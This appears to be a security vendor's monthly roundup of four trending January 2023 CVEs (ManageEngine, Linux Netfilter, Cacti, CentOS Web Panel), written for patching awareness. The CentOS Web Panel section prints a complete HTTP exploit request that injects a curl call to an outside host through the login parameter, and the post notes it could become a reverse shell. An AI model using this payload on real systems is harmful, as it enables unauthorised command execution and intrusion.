Top Trending CVEs of January 2023

Happy New Year! In this month’s trending CVEs ManageEngine takes the top spot with yet another unauthenticated remote command execution (RCE) vulnerability that impacts a wide range of their products. A researcher poking around the Linux kernel has identified a buffer overflow in the Netfilter subsystem, which is used for various low level network operations. Cacti, a popular open-source network monitoring framework, was hit with an unauthenticated remote command execution vulnerability. Finally, we cover an unauthenticated RCE vulnerability identified in the Centos Web Panel, which has roughly 35k deployments. In a surprising twist all of these vulnerabilities have public exploit code. Roll up your sleeves and drop to a command line as we cover some of January’s trendiest vulnerabilities.

1. ManageEngine Unauthenticated RCE CVE-2022-47966

Researchers have identified a RCE vulnerability in a wide range of ManageEngine products, however only for deployments with SAML authentication enabled. The issue is related to the presence of an outdated Apache Santuario dependency, which is used for SAML validation. The vulnerability arises due to the order in which SAML data is verified. SAML assertions are sent by the client (browser) as XML objects and contain various elements that need to be validated by the server. The Apache Santuario library used to perform this validation on vulnerable deployments checks the “References” element first and then checks cryptographical integrity to ensure the SAML assertion was not tampered with. The SAML verification order is at the core of the vulnerability. SAML Reference elements generally contain digest values, but can also contain “Transform” elements that describe how to modify an element. The “Transform” elements achieve this modification via XSL transformations (XSLT). Within ManageEngine an XSLT is capable of executing arbitrary Java code. Bringing this all together it’s possible for an attacker to craft a malicious SAML assertion that contains “Transform” elements that result in arbitrary code execution. The researcher who found this bug did so by analyzing the changes between ManageEngine updates, the most significant of which was the update to libxmlsec from v1.4.1 to v2.2.3. If you check the release notes for libxmlsec v1.4.2, you’ll notice that Reference element verification is performed last vs first, thus eliminating the ability of an attacker to inject malformed values into a Transform element. Public exploit code and vulnerability scanner have been released. Patch now or disable SAML authentication until you can.

Systems Impacted:

Read more: 

• https://www.horizon3.ai/manageengine-cve-2022-47966-technical-deep-dive/
• https://github.com/horizon3ai/CVE-2022-47966
• https://github.com/vonahisec/CVE-2022-47966-Scan
• https://www.manageengine.com/security/advisory/CVE/cve-2022-47966.html
• https://blog.viettelcybersecurity.com/saml-show-stopper/

2. Linux Kernel Netfilter Buffer Overflow CVE-2023-0179

The Linux kernel 5.5 to 6.2 is prone to a buffer overflow in the Netfilter subsystem. The Netfilter subsystem is responsible for low level networking operations and is often used in a capacity similar to iptables. The buffer overflow present in the function nft_payload_copy_vlan results from an integer underflow, which is a weird concept to wrap your brain around. Effectively, a buffer bounds check passes as true, but a typo in the subsequently processed code permits an integer underflow on an unsigned value, which results in an unintended large buffer. The excessively large buffer is then copied via memcpy to the previously allocated buffer, which results in an out of bounds write aka a buffer overflow. Publicly available exploits demonstrate that memory addresses can be leaked from the attack. Additionally the researcher who published the advisory and patch provided evidence that this could be weaponized to achieve remote command execution resulting in privilege escalation. However, the proof-of-concept stopped short of a fully functional RCE payload. This vulnerability was only assigned a CVSS score of 4 based purely on information leakage, but it has the sneaky potential to introduce more risk than it would initially seem. I would bank on the eventual release of a weaponized payload capable of achieving remote command execution and privilege escalation. This vulnerability requires the ability to execute commands on the system, so direct unauthenticated remote exploitation is not possible.

Systems/Applications Impacted: All Linux kernel versions from 5.5 to 6.2-rc3

Read more: 

• https://www.openwall.com/lists/oss-security/2023/01/13/2
• https://github.com/TurtleARM/CVE-2023-0179-PoC

3. Cacti Unauthenticated RCE CVE-2022-46169

Cacti is an open source network monitoring framework with roughly 35,000 deployments worldwide (according to the Cacti team), with thousands of those publicly accessible. Within Cacti the “remote_agent.php” script was found to be prone to an authentication bypass vulnerability that can be chained with another flaw to achieve RCE. Authentication bypass is possible due to the manner in which remote clients are authorized when accessing “remote_agent.php”. As part of the authorization process the client IP is captured. The “get_client_address” function inspects a number of different values to retrieve the IP address, some of which are HTTP headers that an attacker has full control over. By injecting the IP address of the Cacti server into, for example, an HTTP_X_FORWARDED header it’s possible to compel the server to perform a host name lookup. The resolved host name is then compared against a table of authorized hosts, which by default includes the Cacti web server. Once authorization is bypassed, attackers can inject arbitrary commands into the “poller_id” parameter, which under the correct conditions becomes the first parameter of a call to “proc_open” leading to RCE. This is a pretty cool vuln and very easy to exploit. Patch now!

Systems/Applications Impacted: Cacti version 1.2.22 and below

Read more: 

• https://www.sonarsource.com/blog/cacti-unauthenticated-remote-code-execution/
• https://github.com/Cacti/cacti/security/advisories/GHSA-6p93-p743-35gf4

4. CentOS Web Panel 7 Unauthenticated RCE CVE-2022-44877

CentOS Web Panel, a Linux based web hosting management system, is prone to a trivial remote command execution vulnerability. It was determined that the “login/index.php” script fails to sufficiently sanitize input supplied to the “login” URL query parameter. Crafted requests that contain shell metacharacters injected into the vulnerable parameter results in the remote command execution. Exploitation is extremely trivial, as demonstrated below:

POST /login/index.php?login=$(curl${IFS}iwib5kpqofvnzn6f7dnwdmz86zcq0ho6.oastify.com) HTTP/1.1
Host: 10.13.37.10:2031
Cookie: cwpsrv-2dbdc5905576590830494c54c04a1b01=6ahj1a6etv72ut1eaupietdk82
Content-Length: 40
Origin: https://10.13.37.10:2031
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: https://10.13.37.10:2031/login/index.php?login=failed
Accept-Encoding: gzip, deflate
Accept-Language: en
Connection: close

username=root&password=toor&commit=Login

When submitted, the above request will process the “curl” command injected into the “login” URL query parameter. It would be trivial to turn this into a reverse shell. Patch now!

Systems/Applications Impacted: CentOS Web Panel 7 version 0.9.8.1146 or earlier

Read More: 

• https://github.com/numanturle/CVE-2022-44877
• https://nvd.nist.gov/vuln/detail/CVE-2022-44877

To stay up to date on the latest trending and critical celebrity vulnerabilities, subscribe to NopSec’s newsletter. If you don’t like having to keep up with vulnerabilities like these yourself, let our Unified VRM platform do it for you. It takes into account new critical vulnerabilities as they emerge, ensuring your risks are prioritized accordingly in your unique environment. If you’d like to see what NopSec’s Unified VRM can do in action watch this on-demand product tour.